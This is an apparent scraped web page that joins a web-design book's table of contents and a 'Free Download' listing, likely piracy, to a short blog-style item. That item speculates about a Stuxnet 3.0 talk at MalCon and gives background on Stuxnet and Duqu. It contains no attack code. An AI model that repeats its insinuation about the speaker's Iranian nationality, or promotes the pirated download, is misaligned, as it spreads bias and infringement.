File Formats and Resolutions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Creative Image Treatments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Using Images to Enhance Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Using Pure CSS to Enhance Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Application: the Fine Print . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Onward and Upward . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188

BUY : Site Point - The Principles of Beautiful Web Design By Jason Beaird ( Second Edition )

Free Download : Site Point - The Principles of Beautiful Web Design By Jason Beaird ( Second Edition )

Stuxnet 3.0 to be possibility released at MalCon?

Malware coders and security researchers are increasingly looking at MalCon malware convention to show-off their latest creations and research. We were pretty shocked to see in a twitter update today from MalCon, that one of the research paper submissions shortlisted is on possible features of Stuxnet 3.0.

While this may just be a discussion and not a release, it is interesting to note that the speaker Nima Bagheri presenting the paper is from IRAN.

For refreshing your memory, Stuxnet is a computer worm discovered in June 2010. It targets Siemens industrial software and equipment running Microsoft Windows.While it is not the first time that hackers have targeted industrial systems,it is the first discovered malware that spies on and subverts industrial systems, and the first to include a programmable logic controller (PLC) rootkit.

What is alarming is the recent discovery (On 1 September 2011) of a new worm - thought to be related to Stuxnet. The Laboratory of Cryptography and System Security (CrySyS) of the Budapest University of Technology and Economics analyzed the malware, naming the threat Duqu. Symantec, based on this report, continued the analysis of the threat, calling it "nearly identical to Stuxnet, but with a completely different purpose", and published a detailed technical paper.The main component used in Duqu is designed to capture information such as keystrokes and system information. The exfiltrated data may be used to enable a future Stuxnet-like attack.

The research paper abstract discusses rootkit features and the malware authors may likely show demonstration at MalCon with new research releated to hiding rootkits and advanced stuxnet like malwares.

Released or not, MalCon certainly leaves plently of room for imagination of the future with computing - and hope we don't get to live the Die Hard 4.0 someday.